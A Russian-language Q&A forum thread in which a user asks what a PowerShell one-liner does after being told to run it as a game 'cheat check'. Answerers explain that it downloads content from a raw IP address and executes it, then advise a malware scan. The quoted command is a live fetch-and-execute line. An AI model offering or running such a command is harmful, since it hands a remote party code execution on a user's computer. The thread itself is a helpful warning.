Powershell -c "irm http//5.35.98.77 | iex" что это,сказали ввести в повершелле я ввел

Timka Сергей Ученик (97), закрыт 1 неделю назад
Powershell -c "irm http//5.35.98.77 | iex" что это,сказали ввести в повершелле я ввел
Лучший ответ
- Мастер (1215) 1 неделю назад
Сначала выполнение HTTP-запроса на указанный сервис, затем отправка полученных данных на вход Invoke-Expression, и выполнение команды или выражения на локальном ПК.
Какой был вывод? Должна быть ошибка - после http двоеточия нет.
IP резолвится в VDS какого-то котяры6871. Не рекомендую такое выполнять.
Timka СергейУченик (97) 1 неделю назад
убрал двоеточие тк мейл.ру запретил это и ещё можно чуть чуть попроще объяснить вывод пожалуйста
-Мастер (1215) 1 неделю назад
Результат выполнения команды был какой-то, компьютер что-то написал после выполнения команды?
Timka Сергей Ученик (97) в повершелле написало ничего не найдено
-Мастер (1215) 1 неделю назад
Грубо говоря, смысл этой команды - получение данных с указанного в команде "сайта", и выполнение того, что получено, на твоем компьютере
-Мастер (1215) 1 неделю назад
Значит, не выполнилось. Это хорошо. Но на всякий случай, надо бы проверить компьютер с помощью Dr.Web CureIt!, к примеру. И не выполняй сомнительные команды в PowerShell, тем более, такие, как эта.
Timka Сергей Ученик (97) -, может подскажите сайт где настоящий dr.web cureit?если да,то спасибо
-Мастер (1215) 1 неделю назад
Хотя, может и выполнилось. "Ничего не найдено" может и то, что прилетело с этого "сайта" написать, при выполнении
-Мастер (1215) 1 неделю назад
Внизу на сайте там можно бесплатно скачать свежую версию
Остальные ответы
Сава Профи (501) 1 неделю назад
А кто сказал ввести? Если какой-то неизвестный, то возможно взлом какой-то
Timka СергейУченик (97) 1 неделю назад
проверка на читы
Сава Профи (501) Timka Сергей, я уже прочитал похожий ответ. Не стоило вводить, конечно. Это в какой-то игре потребовали?